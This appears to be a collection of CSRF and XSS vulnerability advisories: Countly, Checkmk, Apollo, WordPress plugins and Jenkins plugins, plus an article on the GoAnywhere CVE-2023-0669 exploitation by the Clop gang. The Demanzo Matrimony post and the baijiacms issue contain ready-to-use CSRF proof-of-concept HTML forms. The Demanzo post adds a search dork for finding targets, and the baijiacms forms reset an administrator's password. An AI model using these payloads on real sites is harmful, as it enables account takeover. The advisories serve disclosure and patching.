Countly, a product analytics solution, is vulnerable to cross-site scripting prior to version 21.11 of the community edition. The victim must follow a malicious link or be redirected there from malicious web site. The attacker must have an account or be able to create one. This issue is patched in version 21.11.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"\>  <html\> <head\> <meta http-equiv\="Cache-Control" content\="no-cache, no-store, must-revalidate" /> <meta http-equiv\="Pragma" content\="no-cache" /> <meta http-equiv\="Expires" content\="0" /> <meta name\="referrer" content\="no-referrer"\> <link href\='../stylesheets/pre-login/main.css' rel\='stylesheet' type\='text/css'\> <link rel\="icon" type\="image/png" href\="../<%- countlyFavicon %>"\> <% if (themeFiles && themeFiles.css) { %\> <% for(var i=0, l=themeFiles.css.length; i<l; i++) {%\> <link href\='<%= themeFiles.css\[i\]%>' rel\='stylesheet' type\='text/css'\> <% } %\> <% } %\> <title\><%- countlyTitle %\></title\> <script\>window.countlyGlobal \= window.countlyGlobal || {}; countlyGlobal\["cdn"\] \= "<%- cdn %>../";</script\> <% if (typeof inject\_template.css != 'undefined') { %\> <style\><%\- inject\_template.css %\></style\> <% } %\> </head\> <body\> <% if (message){ %\> <div id\="message"\></div\> <% } %\> <div id\="top-container"\> <% if (countlyPage){ %\> <a class\="top-button" href\="<%- countlyPage %>"\><%- countlyTitle %\></a\> <% } %\> <div class\="top-button" id\="select-lang"\> <div id\="active-lang"\>EN</div\> <div id\="langs"\> <div class\="group"\> <% for(var i=0, l=(languages.length/2); i<l; i++) {%\> <a data-language-code\="<%=languages\[i\].code%>" class\="item"\><%=languages\[i\].name%\></a\> <% } %\> </div\> <div class\="group"\> <% for(var i=(parseInt(languages.length/2) + 1), l=languages.length; i<l; i++) {%\> <a data-language-code\="<%=languages\[i\].code%>" class\="item"\><%=languages\[i\].name%\></a\> <% } %\> </div\> </div\> </div\> </div\> <div id\="reset-form"\> <div id\="forgot-left"\> <div id\="forgot-logo"\></div\> </div\> <div style\="height: 20px; font-size: 15px; color: #A7A7A7; text-align: center; width: 400px; margin: 0 auto 30px; line-height: 21px;" data-localize\="reset.explanation"\></div\> <div id\="create-account"\> <form id\="reset-password-form" method\="POST" action\="../reset"\> <div\> <input type\="password" name\="password" placeholder\="Password" data-localize\="placeholder.password" autocomplete\="<% if(security.autocomplete) {%>on<%} else { %>off<%}%>"/> </div\> <div\> <input type\="password" name\="again" placeholder\="Again" data-localize\="placeholder.again" autocomplete\="<% if(security.autocomplete) {%>on<%} else { %>off<%}%>"/> </div\> <% if (typeof inject\_template.form != "undefined") { %\> <%- inject\_template.form %\> <% } %\> <div\> <input type\="hidden" value\="<%= prid %>" name\="prid" /> <input type\="hidden" value\="<%= csrf %>" name\="\_csrf" /> <input type\="hidden" value\="en" name\="lang" id\="form-lang" /> <% if (newinvite) { %\> <input id\="login-button" value\="Reset my password" type\="submit" data-localize\="reset.buttonnew" style\="margin-top: 0;"/> <% } else { %\> <input id\="login-button" value\="Reset my password" type\="submit" data-localize\="reset.button" style\="margin-top: 0;"/> <% } %\> </div\> </form\> </div\> <% if (typeof inject\_template.html != "undefined") { %\> <%- inject\_template.html %\> <% } %\> </div\> <script language\="javascript" type\="text/javascript" src\="../javascripts/dom/jquery/jquery.js"\></script\> <script language\="javascript" type\="text/javascript" src\="../javascripts/utils/prefixfree.min.js"\></script\> <script language\="javascript" type\="text/javascript" src\="../javascripts/utils/store+json2.min.js"\></script\> <script language\="javascript" type\="text/javascript" src\="../javascripts/utils/jquery.i18n.properties-min-1.0.9.js"\></script\> <script language\="javascript" type\="text/javascript" src\="../javascripts/utils/jquery.xss.js"\></script\> <script language\="javascript" type\="text/javascript" src\="../javascripts/pre-login.js"\></script\> <script\> var countlyTitle \= "<%- countlyTitle %>"; $(document).ready(function() { <% if (message && message.length \> 0){ %\> showMessage("<%= message %>", "<%= password\_min %>"); <% } %\> if (jQuery.i18n.map\["forgot.title"\]) { document.title \= countlyTitle + " | " + jQuery.i18n.map\["forgot.title"\]; } }); $(document).bind('clyLangChange', function() { if (jQuery.i18n.map\["forgot.title"\]) { document.title \= countlyTitle + " | " + jQuery.i18n.map\["forgot.title"\]; } }); </script\> <% if (typeof inject\_template.js != 'undefined') { %\> <script\><%\- inject\_template.js %\></script\> <% } %\> <% if (themeFiles && themeFiles.js) { %\> <% for(var i=0, l=themeFiles.js.length; i<l; i++) {%\> <script language\="javascript" type\="text/javascript" src\="<%=themeFiles.js\[i\]%>"\></script\> <% } %\> <% } %\> </body\> </html\>

CVE-2021-32852: countly-server/reset.html at 6b90bb775e747cabe46fe197c6a6989acc6c3417 · Countly/countly-server

Cross-site Request Forgery (CSRF) in Tribe29's Checkmk <= 2.1.0p17, Checkmk <= 2.0.0p31, and all versions of Checkmk 1.6.0 (EOL) allow an attacker to add new visual elements to multiple pages.

Component

Setup

Title

Fix CSRF in add-visual endpoint

Date

Dec 1, 2022

Checkmk Edition

Checkmk Raw (CRE)

Checkmk Version

2.2.0b1 2.1.0p18 2.0.0p32

Level

Trivial Change

Class

Security Fix

Compatibility

Compatible - no manual interaction needed

Previously to this Werk an attacker could utilize a cross site request forgery vulnerability in Checkmk to add elements to visuals (e.g. dashboards, reports, etc.).

**Mitigations:** If you are unable to update in a timely manner you could remove the permission Customize dashboards and use them and Customize reports and use them from the used roles. So the users and admins cannot edit dashboards and reports anymore. Adding a Custom url with a malicious URL is blocked by the Content-Security-Policy.

All versions of Checkmk including (1.6) are subject to this vulnerability.

This vulnerability was found through a self commissioned Penetration test.

We have rated the issue with a CVSS Score of 5.4 (Medium) with the following CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L A CVE has been requested.

To the list of all Werks

CVE-2022-48320: Fix CSRF in add-visual endpoint

Apollo is a configuration management system. Prior to version 2.1.0, a low-privileged user can create a special web page. If an authenticated portal admin visits this page, the page can silently send a request to assign new roles for that user without any confirmation from the Portal admin. Cookie SameSite strategy was set to Lax in version 2.1.0. As a workaround, avoid visiting unknown source pages.

**Impact**

A low-privileged user can create a special web page. If an authenticated portal admin visits this page, the page can silently send a request to assign new roles for that user without any confirmation from the Portal admin.

**Patches**

Cookie SameSite strategy was set to Lax in #4664 and was released in v2.1.0.

**Workarounds**

To fix the potential issue without upgrading, simply follow the advice that does not visit unknown source pages.

**References**

Apollo Security Guidence

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in issue
*   Email us at apollo-config@googlegroups.com

CVE-2023-25569: Potential csrf issue in apollo-portal

Weeks after an exploit was first announced in a popular cloud-based file transfer service, could some organizations still be vulnerable? The answer is yes.

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) added three new entries to its Known Exploited Vulnerabilities catalog. Among them was CVE-2023-0669, a bug that has paved the way for exploits and follow-on ransomware attacks against hundreds of organizations in recent weeks.

The bug was discovered in GoAnywhere, a Windows-based file-sharing software from Fortra, formerly HelpSystems. According to its website, GoAnywhere is used at more than 3,000 organizations to manage documents of all kinds. According to data from Enlyft, most of those are large organizations — with at least 1,000 and, often, more than 10,000 employees — mostly based in the United States.

The bug tracked as CVE-2023-0669 allows hackers to remotely execute code in target systems, through the internet, without need for authentication. As of this writing, this vulnerability has not yet received an official CVSS rating from the National Vulnerability Database.

But we need not wonder about how dangerous it is, as hackers have already pounced. On Feb. 10 — days after Fortra released a patch — the Clop ransomware gang claimed to have exploited CVE-2023-0669 in over 130 organizations.

After three weeks and counting, it's unclear whether or not more organizations are still at risk.

**Timeline of the GoAnywhere Exploit(s)**

On Feb. 2, two abnormal commands triggered alerts in an IT environment monitored by endpoint detection and response (EDR) vendor Huntress. Both were executed on a host designated for processing transactions on the GoAnywhere platform, though the significance of this wasn't clear yet.

"At first glance, the alert itself was fairly generic," wrote Joe Slowik, threat intelligence manager for Huntress. "But further analysis revealed a more interesting set of circumstances."

An entity on this alerted network had attempted to download a file from a remote resource. Slowik and his colleagues tried to access the file themselves, but by then the port used to download it had been closed up. "We don't really know for certain why," Slowik tells Dark Reading. "It's possible that the adversary was working at a very rapid clip."

They did have the IP address of that entity, however, which traced back to Bulgaria, and was flagged as malicious by VirusTotal. The actor seemed to be from outside of the organization, and had used their first command to download and run a dynamic link library (DLL) file.

"Knowing that the DLL was also executed further raised the risk level of the incident," Slowik says, "since if it was malware that was downloaded, it is now running on the system."

There were other signs, too, that this was a compromise. But even after isolating the relevant server, a second server at the targeted organization became infected. "We were worried that we had a very persistent adversary," Slowik recalls.

The researchers still lacked a copy of the downloaded malware, but all of the evidence surrounding it seemed to accord with activity previously associated with a malware family called Truebot. "The post in the URI structure that was used mapped to earlier Truebot samples," Slowik says. "The DLL exports that were referenced in order to launch the malware, or similar to historical tripod samples, as well as some strings and code structures, all matched. Within the samples themselves, all of it aligned very nicely with what had previously been reported in 2022 for Truebot."

Truebot has been linked to a prolific Russian group called TA505. Notably, TA505 has utilized the ransomware-as-a-service (RaaS) malware "Clop" in previous attacks.

On the same day as Slowik's investigation, reporter Brian Krebs publicly republished an advisory Fortra had sent to its users the day before. GoAnywhere was being exploited, its developers explained, and they were implementing a temporary service outage in response.

Whatever mitigations were taken weren't enough. On Feb. 10, hackers behind the Clop ransomware told Bleeping Computer that they’d used the GoAnywhere exploit to breach over more than organizations.

**How CVE-2023-0669 Works**

CVE-2023-0669 is a cross-site request forgery (CSRF) but that arises from how unpatched GoAnywhere users install their software licenses.

Interestingly, it was as much a design choice as an oversight. "Typically, installing a license involves downloading a license file from a server and uploading it to your device," explains Ron Bowes, lead security researcher for Rapid7, who released the most detailed publicized analysis of how an internal user could trigger the exploit. "Fortra chose to make that whole process transparent, where the license is delivered through the administrator's browser. That means the user gets a much smoother experience."

However, that seamlessness came at a cost. "There is no CSRF protection (and the cookie is not actually required, so no authentication is required to exploit this issue)," Bowes explained in his analysis. "That means that this can, by design, be exploited via cross-site request forgery."

In its report, Rapid7 labeled the exploitability of this vulnerability as "very high."

"While the administration port should not be exposed to the internet," Bowes says, "it's very easy to configure it that way by mistake. And once an attacker understands the vulnerability, it can be exploited without any risk of crashing the application or corrupting data."

Rapid7 also labeled "very high" the value of such an exploit to an attacker. As Bowes explains, "due to the nature of the application (managed file transfer, or MFT), it's common for a GoAnywhere MFT server to sit on a network perimeter and to have the file transfer ports publicly exposed. This makes it a good target for both pivoting into an organization's internal network, and/or stealing potentially sensitive data directly off the target."

On Feb. 6, Fortra fixed CVE-2023-0669 "by adding what they call a 'license request token,'" Bowes explains, "which is included in the encrypted request to Fortra's server. It behaves exactly as a CSRF token would, preventing an attacker from leveraging an administrator's browser."

**What to Do Now**

As severe as the exploit is, only a fraction of GoAnywhere customers are vulnerable to outside hackers through CVE-2023-0669. However, even those without Internet-exposed GoAnywhere instances are still vulnerable to internal users or attackers who have gained initial compromise to a network via regular Web browsers.

The bug can be exploited remotely if an organization’s GoAnywhere administration port — 8000 or 8001 — is exposed on the Internet. As of last week, more than 1,000 GoAnywhere instances were exposed, but, Bleeping Computer explained, only 135 of those pertained to the relevant ports 8000 and 8001. Most of those vulnerable seem to have already been swept up in one big campaign by the Clop group.

"We urgently advise all GoAnywhere MFT customers to apply this patch," Fortra wrote in another advisory to its internal customers. "Particularly for customers running an admin portal exposed to the Internet, we consider this an urgent matter."

Massive GoAnywhere RCE Exploit: Everything You Need to Know

Demanzo Matrimony version 1.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Demanzo Matrimony v.1.5 CSRF Vulnerability                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit)                                            |   
| # Vendor    : https://demanzo.com/matrimony-site-development/                                                                    |    
| # Dork      : Powered by ITAcumens or "Powered by Demanzo"                                                                       |  
====================================================================================================================================

poc :

[+] infected file: add-staff.php

[+] Inside folder /admin/add-staff.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 2.

[+] Set the target site link Save changes and apply . 

</div>  
                       <form action="https://www.example/web/html/admin/add-staff.php" method="POST">  
            <div id="msg">  
                          <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Name <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Password <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Email ID <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="email" id="email" value="" type="email" class="form-control" placeholder="Enter Email ID">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Gender <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">   
                                    <input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label>  
                                    <input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label>  
                            </div>  
                            </div>

                                                           <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label frm_pd col-md-2">Designation <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation">     
                                </div>  
                            </div>   

                                                        <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label col-md-2 frm_pd">Address  <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea>    
                                </div>  
                            </div> 

                                                          
                                
                                  
                                    
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                  
                            

                                                          
                                
                                  
                                       
                                       
                              
                            

                                                        <div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad">  
                              <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status <span class="red">*</span> : </label>  
                                <div class="col-lg-8 col-md-10 frm_pd">   
                                    <input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label>  
                                    <input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label>  
                            </div>  
                            </div>

                                                        <div class="col-md-2 col-md-offset-5 col-sm-12">  
                                <input type="submit" class="ctn_btn no_mt1" value="Add" name="add">  
                            </div> 

 Greetings to :===================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|          
==================================================================================================

Demanzo Matrimony 1.5 Cross Site Request Forgery

Cross-Site Request Forgery (CSRF) vulnerability in WpDevArt Booking calendar, Appointment Booking System plugin <= 3.2.3 versions affects plugin forms actions (create, duplicate, edit, delete).

**Solution**

Update the WordPress Booking calendar, Appointment Booking System plugin to the latest available version (at least 3.2.4).

yuyudhn discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Booking calendar, Appointment Booking System Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 3.2.4.

**5 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-24388: WordPress Booking calendar, Appointment Booking System plugin <= 3.2.3 - Cross Site Request Forgery (CSRF) - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in HasThemes Extensions For CF7 plugin <= 2.0.8 versions leads to arbitrary plugin activation.

**Solution**

Update the WordPress Extensions For CF7 plugin to the latest available version (at least 2.0.9).

Lana Codes discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Extensions For CF7 Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 2.0.9.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23899: WordPress Extensions For CF7 (Contact form 7 Database, Conditional Fields and Redirection) plugin <= 2.0.8 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross Site Request Forgery (CSRF) vulnerability in baijiacms 4.1.4, allows attackers to change the password or other information of an arbitrary account via index.php.

**Vulnerability description**

A csrf vulnerability was discovered in baijiacmsV4.  
There is a CSRF attacks vulnerability.After the administrator logged in, open the following two page,attacker can modify the store information and login password.  
1.modify the store information.  
poc：

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://10.0.0.128/index.php?mod=site&op=post&id=2&act=manager&do=store" method="POST">
          <input type="hidden" name="id" value="2" />
          <input type="hidden" name="sname" value="xxx" />
          <input type="hidden" name="website" value="xxx" />
          <input type="hidden" name="fullwebsite" value="http&#58;&#47;&#47;xxx&#47;" />
          <input type="hidden" name="status" value="1&apos;" />
          <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;index&#46;php" />
          <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;admin&#46;php" />
          <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

Original store information  
  
When a logged in administrator opens a malicious web page and clicks the button  
  
And the store information has changed  

2.modify login password.  
poc:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://10.0.0.128/index.php?mod=site&op=changepwd&id=1&act=manager&do=user" method="POST">
          <input type="hidden" name="username" value="admin" />
          <input type="hidden" name="newpassword" value="111111" />
          <input type="hidden" name="confirmpassword" value="111111" />
          <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

When a logged in administrator opens a malicious web page and clicks the button.  
  
And the login password of the administrator will be 111111.

CVE-2021-33396: There is a CSRF vulnerability · Issue #7 · baijiacms/baijiacmsV4

Missing permission checks in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Azure Credentials Plugin
*   Email Extension Plugin
*   JUnit Plugin
*   Pipeline: Build Step Plugin
*   Synopsys Coverity Plugin

**Descriptions****Stored XSS vulnerability in JUnit Plugin**

**SECURITY-3032 / CVE-2023-25761**  
**Severity (CVSS):** High  
**Affected plugin: junit**  
**Description:**

JUnit Plugin 1166.va\_436e268e972 and earlier does not escape test case class names in JavaScript expressions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control test case class names in the JUnit resources processed by the plugin.

JUnit Plugin 1166.1168.vd6b\_8042a\_06de escapes affected test case class names in JavaScript expressions.

**Stored XSS vulnerability in Pipeline: Build Step Plugin**

**SECURITY-3019 / CVE-2023-25762**  
**Severity (CVSS):** High  
**Affected plugin: pipeline-build-step**  
**Description:**

Pipeline: Build Step Plugin 2.18 and earlier does not escape job names in a JavaScript expression used in the Pipeline Snippet Generator.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control job names.

Pipeline: Build Step Plugin 2.18.1 escapes job names in the affected JavaScript expression.

**XSS vulnerability in bundled email templates in Email Extension Plugin**

**SECURITY-2931 / CVE-2023-25763**  
**Severity (CVSS):** High  
**Affected plugin: email-ext**  
**Description:**

Email Extension Plugin bundled multiple preconfigured templates for notification emails. The Email Template Testing feature can be used to see what these and other templates would look like based on a given build.

Email Extension Plugin 2.93 and earlier does not escape various fields included in those email templates, like build display name, user display name, and the names of tests.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control affected fields.

Email Extension Plugin 2.93.1 escapes affected fields in bundled email templates.

**Stored XSS vulnerability in custom email templates in Email Extension Plugin**

**SECURITY-2934 / CVE-2023-25764**  
**Severity (CVSS):** High  
**Affected plugin: email-ext**  
**Description:**

Email Extension Plugin allows defining custom email templates using Config File Provider plugin as Jelly or Groovy files. The Email Template Testing feature can be used to see what these templates would look like based on a given build by specifying the managed: name prefix.

Email Extension Plugin 2.93 and earlier does not escape, sanitize, or sandbox rendered email template output or log output generated during template rendering.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create or change custom email templates.

Email Extension Plugin 2.93.1 renders email template previews inside a sandboxed iframe.

**Script Security sandbox bypass vulnerability in Email Extension Plugin**

**SECURITY-2939 / CVE-2023-25765**  
**Severity (CVSS):** High  
**Affected plugin: email-ext**  
**Description:**

Email Extension Plugin allows defining custom email templates using Config File Provider plugin as Jelly or Groovy files. When defined inside a folder, email templates need to be subject to Script Security protection (sandboxed execution or full-script approval).

In Email Extension Plugin 2.93 and earlier, templates defined inside a folder were not subject to Script Security protection.

This vulnerability allows attackers able to define email templates in folders to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.

Email templates defined in folders are subject to sandbox protection in Email Extension Plugin 2.93.1.

**Missing permission checks in Azure Credentials Plugin allow enumerating credentials IDs**

**SECURITY-1757 / CVE-2023-25766**  
**Severity (CVSS):** Medium  
**Affected plugin: azure-credentials**  
**Description:**

Azure Credentials Plugin 253.v887e0f9e898b and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in Azure Credentials Plugin 254.v64da\_8176c83a requires Overall/Administer permission.

**CSRF vulnerability and missing permission checks in Azure Credentials Plugin**

**SECURITY-1756 / CVE-2023-25767 (CSRF), CVE-2023-25768 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: azure-credentials**  
**Description:**

Azure Credentials Plugin 253.v887e0f9e898b and earlier does not perform permission checks in methods implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified web server.

Additionally, these form validation methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

These form validation methods require POST requests and Overall/Administer permission in Azure Credentials Plugin 254.v64da\_8176c83a.

**Missing permission checks in Synopsys Coverity Plugin allow enumerating credentials IDs**

**SECURITY-2793 (1) / CVE-2023-23850**  
**Severity (CVSS):** Medium  
**Affected plugin: synopsys-coverity**  
**Description:**

Synopsys Coverity Plugin 3.0.2 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in Synopsys Coverity Plugin 3.0.3 requires the appropriate permissions.

**CSRF vulnerability and missing permission checks in Synopsys Coverity Plugin allow capturing credentials**

**SECURITY-2793 (2) / CVE-2023-23847 (CSRF), CVE-2023-23848 (missing permission check)**  
**Severity (CVSS):** High  
**Affected plugin: synopsys-coverity**  
**Description:**

Synopsys Coverity Plugin 3.0.2 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Synopsys Coverity Plugin 3.0.3 requires POST requests and the appropriate permissions for the affected HTTP endpoints.

**Severity**

*   SECURITY-1756: Medium
*   SECURITY-1757: Medium
*   SECURITY-2793 (1): Medium
*   SECURITY-2793 (2): High
*   SECURITY-2931: High
*   SECURITY-2934: High
*   SECURITY-2939: High
*   SECURITY-3019: High
*   SECURITY-3032: High

**Affected Versions**

*   **Azure Credentials Plugin** up to and including 253.v887e0f9e898b
*   **Email Extension Plugin** up to and including 2.93
*   **JUnit Plugin** up to and including 1166.va\_436e268e972
*   **Pipeline: Build Step Plugin** up to and including 2.18
*   **Synopsys Coverity Plugin** up to and including 3.0.2

**Fix**

*   **Azure Credentials Plugin** should be updated to version 254.v64da\_8176c83a
*   **Email Extension Plugin** should be updated to version 2.93.1
*   **JUnit Plugin** should be updated to version 1166.1168.vd6b\_8042a\_06de
*   **Pipeline: Build Step Plugin** should be updated to version 2.18.1
*   **Synopsys Coverity Plugin** should be updated to version 3.0.3

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2793 (1), SECURITY-2793 (2)
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-3019, SECURITY-3032
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1756, SECURITY-1757
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-2931, SECURITY-2939
*   **Yaroslav Afenkin, CloudBees, Inc. and independently, Valdes Che Zogou** for SECURITY-2934

CVE-2023-23848: Jenkins Security Advisory 2023-02-15

A missing permission check in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

Tag

#csrf